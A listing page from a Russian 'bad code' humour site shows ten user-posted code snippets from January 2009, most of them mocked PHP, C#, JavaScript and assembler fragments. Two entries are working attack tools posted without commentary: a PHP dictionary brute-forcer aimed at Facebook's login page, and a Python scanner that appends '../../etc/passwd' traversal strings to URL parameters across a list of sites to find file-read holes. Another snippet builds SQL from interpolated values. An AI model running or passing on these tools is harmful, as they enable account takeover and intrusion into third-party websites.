1. Список говнокодов пользователя guest

    Всего: 1419

  2. PHP / Говнокод #457

    +35

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    8. 8
    <tr>
    	    <td width="21"><a href="javascript:couleur(0);" onMouseOver="window.status='<?php echo __("noir")?>';return true;"><img name="cou0" src="<?php echo HTTP_CHAT?>images/noir-select.gif" width=21 height=21 border=0 alt=""></a></td>
    	    <td width="21"><a href="javascript:couleur(1);" onMouseOver="window.status='<?php echo __("violet")?>';return true;"><img name="cou1" src="<?php echo HTTP_CHAT?>images/violet.gif" width=21 height=21 border=0 alt=""></a></td>
    	    <td width="21"><a href="javascript:couleur(2);" onMouseOver="window.status='<?php echo __("bleu")?>';return true;"><img name="cou2" src="<?php echo HTTP_CHAT?>images/bleu.gif" width=21 height=21 border=0 alt=""></a></td>
    	    <td width="21"><a href="javascript:couleur(3);" onMouseOver="window.status='<?php echo __("vert")?>';return true;"><img name="cou3" src="<?php echo HTTP_CHAT?>images/vert.gif" width=21 height=21 border=0 alt=""></a></td>
    	    <td width="21"><a href="javascript:couleur(4);" onMouseOver="window.status='<?php echo __("rouge")?>';return true;"><img name="cou4" src="<?php echo HTTP_CHAT?>images/rouge.gif" width=21 height=21 border=0 alt=""></a></td>
    	    <td width="21"><a href="javascript:couleur(5);" onMouseOver="window.status='<?php echo __("orange")?>';return true;"><img name="cou5" src="<?php echo HTTP_CHAT?>images/orange.gif" width=21 height=21 border=0 alt=""></a></td>
    	</tr>

    маленький кусочек говна из большого куска французского движка

    guest, 26 Января 2009

    Комментарии (2)
  3. PHP / Говнокод #456

    +24

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    <html>
    <body>
    <button onclick="document.getElementById('f').size=1" >222</button>
    <select id="f" size="3">
    <option>1</option>
    <option>3</option>
    <option>4</option>
    <option>5</option>
    <select>
    </body>
    </html>

    guest, 26 Января 2009

    Комментарии (0)
  4. C# / Говнокод #455

    −14

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    uint i;
    …
    if (i.ToString().Length == 1)
    {
      ...
    }

    Не сразу можно понять, что в этом коде просто-напросто выполняется проверка i < 10. Алгоритм достаточно прост: выполняется преобразование i в строку, после чего вычисляется ее длина. Если число больше 9, то его десятичная запись содержит больше одного символа. Отрицательные числа переменная типа uint содержать не может. Проверку проходят лишь числа от 0 до 9.

    Алгоритм ресурсоемок, неочевиден и не поддается сопровождению даже теоретически.
    взято с lurkmore.ru, там вообще много про "индусский код"

    guest, 26 Января 2009

    Комментарии (7)
  5. PHP / Говнокод #454

    +27.8

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    function createErrorObj($strField, $bDisplay = 'false', $format = false, $strTitle = null) {
    		
      global $Error, $__error;
      if (!$Error) {  
    	ErrorsHandling::_create();
      }
    		
      if ($bDisplay !== 'true') { 
    	$bDisplay = 'false';
      }
    ....

    страшный для кого-то был $bDisplay

    guest, 26 Января 2009

    Комментарии (0)
  6. Assembler / Говнокод #453

    +72.8

    1. 1
    2. 2
    mov ebx, eax
    mov eax, ebx

    Такое борландовский кодогенератор иногда выдаёт

    guest, 25 Января 2009

    Комментарии (14)
  7. PHP / Говнокод #452

    +34.7

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    } else {
    					$json_array = array('error'	=> $this->log_error('busy', true));
    				}
    			} else {
    				$json_array = array('error'	=> $this->log_error('busy', true));
    			}
    		} else {
    			$json_array = array('error'	=> $this->log_error('busy', true));
    		}
    	} else {
    		$json_array = array('error'	=> $this->log_error('busy', true));
    	}
    	
    	} else {
    		$json_array = array('error'	=> $this->log_error('bad_symbols', false));
    	}
    } else {
    	$json_array = array('error'	=> $this->log_error('check_error', false));
    						//	'errorStr'	=> $this->validation->error_string
    }

    Кусок метода в контроллере регистрации пользователя на одном из наших проектов. Вверху хренова гора ифов а внизу во такое вот счастье. "Авторская" табуляция сохранена

    guest, 25 Января 2009

    Комментарии (1)
  8. JavaScript / Говнокод #451

    +32

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    /** 
     * Сабж: Проверка формы 
     * Для каждого поля в форме было понаколбашено по отдельной(!) функции для проверки
     * Но и это цветочки...
     */ 
    
    // Поехали!(С)
     
    // запуск проверки всех полей формы <- это древний комент
    function checkAll()
    	{
    	var elements = new Array('avto', 'duration', 'start_adress', 'end_adress', 'orderer_name', 'orderer_phone', 'orderer_mail');
    
    	for (i = 0; i < 7; i++)
    		{
    		    var	curEl = document.getElementById(elements[i]);
    		    curEl.focus(); // тут, suka, особенно жестоко!
    		    curEl.blur();  //
    		}
    
    	var StatSum = "";
    
    	for (j = 0; j < 7; j++)
    		{
    			// в форме сделаны были ккрытые инпупуты, куда
    			// проверяющая функция писала 0 или 1 в зависимости от результата проверки
    			var	curStat = document.getElementById(elements[j]+"Status");
    			if (curStat.value == "1")
    				{StatSum = StatSum + "1";}
    			if (curStat.value == "0" || curStat.value == "")
    				{StatSum = StatSum + "";}
    		}
    
    	// ну тут ваще пиздец)))
    	// семь нулей - это семь удачно проверенных полей формы 
    	if 	(StatSum == "" || StatSum == "0000000")
    		{
    			// щёлкаем, suka, по самбмиту..
    			var btn = document.getElementById("submit");
    			btn.click();
    		}
    	return (false);
    	}
    	// занавес...
    	
    /************************************************************/

    Блин, попёрло сейчас покурить свои извращения на JS двухлетней давности...
    У меня истерика = )

    guest, 23 Января 2009

    Комментарии (3)
  9. PHP / Говнокод #450

    +19.2

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    <? 
    ################################ 
    # Face Book Brute Forcer 
    ################################ 
    set_time_limit(0); 
    $username ="[email protected]"; // username to brute force 
    $dictionary ="dictionary.txt"; // need dictionary to password list 
     
    function kontrol($kullaniciadi,$sifre){ 
    $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; 
    $data = "email=$kullaniciadi&pass=$sifre&login=Login" ; 
    $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php'); 
    curl_setopt($ch, CURLOPT_HEADER, 0); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_POST, 1); 
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data); 
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); 
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); 
    $source=curl_exec ($ch); 
    curl_close ($ch); 
    if(eregi("Home</title>",$source)){return true;} else {return false;} 
     
    } 
     
    if(!is_file($dictionary)){echo "$dictionary is not file";exit;} 
    $lines=file($dictionary); 
    echo "Attack Starting..<br>"; 
    sleep(10); 
    echo "Attack Started, brute forcing..<br>"; 
    foreach($lines as $line){ 
    $line=str_replace("\r","",$line); 
    $line=str_replace("\n","",$line); 
    if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P 
    assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;} 
    else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :  
    $line</font><br>";} 
    } 
    ?>

    guest, 23 Января 2009

    Комментарии (6)
  10. Python / Говнокод #449

    −424

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    #!/usr/bin/python
    #LinkScanSimple will take a list of sites and
    #add an extension after the = then search the 
    #source for a match you choose. 
    
    #For an LFI scan I use "root:" but for a shell location
    #I would choose the shell title (r57shell). For SQL
    #you can choose a common sql error.
    
    import sys, re, urllib2, sets, socket
    socket.setdefaulttimeout(5)
    
    #---------------------------------------------------------
    #Edit what you want added to the address.
    EXT = "../../../../../../../../../../../../etc/passwd" 
    
    #Edit what you want to search for.
    MATCH = "root:"
    #---------------------------------------------------------
    
    def parse_urls(links):
    	urls = []
    	for link in links: 
    		num = link.count("=")
    		if num > 0:
    			for x in xrange(num):
    				link = link.rsplit("=",x+1)[0]+"="
    				urls.append(link+EXT)
    	urls = list(sets.Set(urls))
    	return urls
     
    def test(host): 
     	print "[+] Testing:",host.replace(EXT,"")
    	try: 
    		source = urllib2.urlopen(host).read() 
    		if re.search(MATCH, source): 
    			print "[+] Found:",host
    		else: 
    			print "[-] Not Vuln." 
    	except:
    		pass 
     
    
    print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSimple v1.0"
    print "\t-------------------------------------------------\n"
    			
    if len(sys.argv) != 2:
    	print "Usage : ./linkscan.py <site_list>"
    	print "Ex: ./linkscan.py sites.txt\n"
    	sys.exit(1)
    	
    try:
    	sites = open(sys.argv[1], "r").readlines()
    except(IOError): 
      	print "Error: Check your site list path\n"
      	sys.exit(1)
    
    print "[+] Loaded:",len(sites),"sites"
    urls = parse_urls(sites)
    print "[+] Links Found:",len(urls)
    for url in urls: 
    	try:
    		test(url.replace("\n",""))
    	except(KeyboardInterrupt):
    		pass
    print "\n[-] Scan Complete\n"

    guest, 23 Января 2009

    Комментарии (2)
  11. PHP / Говнокод #448

    +28

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    $query = "update users set password = '{$cnf['userpass']}', email = '{$cnf['useremail']}' where login = 'root'";
    if (mysql_query($query, $link) === false) {
         throw new Exception(mysql_error($link));
    }
    mysql_close($link);

    удалить)

    guest, 23 Января 2009

    Комментарии (1)